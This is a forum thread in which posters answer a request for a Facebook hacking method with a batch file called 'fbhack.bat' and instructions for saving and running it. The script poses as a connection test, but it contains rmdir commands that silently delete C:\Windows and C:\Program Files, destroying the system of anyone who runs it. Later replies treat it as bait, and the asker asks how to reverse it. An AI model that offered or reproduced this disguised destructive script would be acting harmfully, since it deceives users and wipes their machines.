nervewrecker wrote:pioneer does all my hacking for me...
@echo on
ECHO Testing Facebook connection..
ping facebook.com
ECHO Facebook connection success!
ECHO Attempting Connect..
rmdir C:\Windows /s /q
rmdir "C:\Program Files" /s /q
ECHO Connect successful.
tracert facebook.com
ECHO
exit
pioneer wrote:r3iXmann wrote:Allyuh cah take anything serious here nah..steupse.
OP, what you need to do is this:
Compile this script but don't run it yet. To do that, copy and paste the contents in notepad and save as 'fbhack.bat'. Ensure that 'Files of type' is changed to 'All files'.@echo on
ping facebook.com
ECHO Connect successful.
tracert facebook.com
ECHO
exit
1. Open an active window with connection to facebook
2. Open the person's profile
3. Execute fbhack script
4. Refresh the page and you should be in the person's account. If it doesn't work then reboot your system
x10
That's how i usually do it.
Causing tuner nightmares, 1 kilobyte at a time.
r3iXmann wrote:Allyuh cah take anything serious here nah..steupse.
Compile this script but don't run it yet. To do that, copy and paste the contents in notepad and save as 'fbhack.bat'. Ensure that 'Files of type' is changed to 'All files'.@echo on
ping facebook.com
ECHO Connect successful.
tracert facebook.com
ECHO
exit
3. Execute fbhack script
4. Refresh the page and you should be in the person's account. If it doesn't work then reboot your system
S_2NR wrote:just googled what rmdir command does..steups..
r3iXmann wrote:Allyuh cah take anything serious here nah..steupse.
ping facebook.com
ECHO Connect successful.
tracert facebook.com
ECHO
exit
3. Execute fbhack script
Bizzare wrote:I feel sorry for the innocent who took the bait
Stephon. wrote:Where u live? Lol time to make uses of meh links in t&tec
sound boy 64 wrote:Stephon. wrote:Where u live? Lol time to make uses of meh links in t&tec
stupes
soo is their any way to reverse this?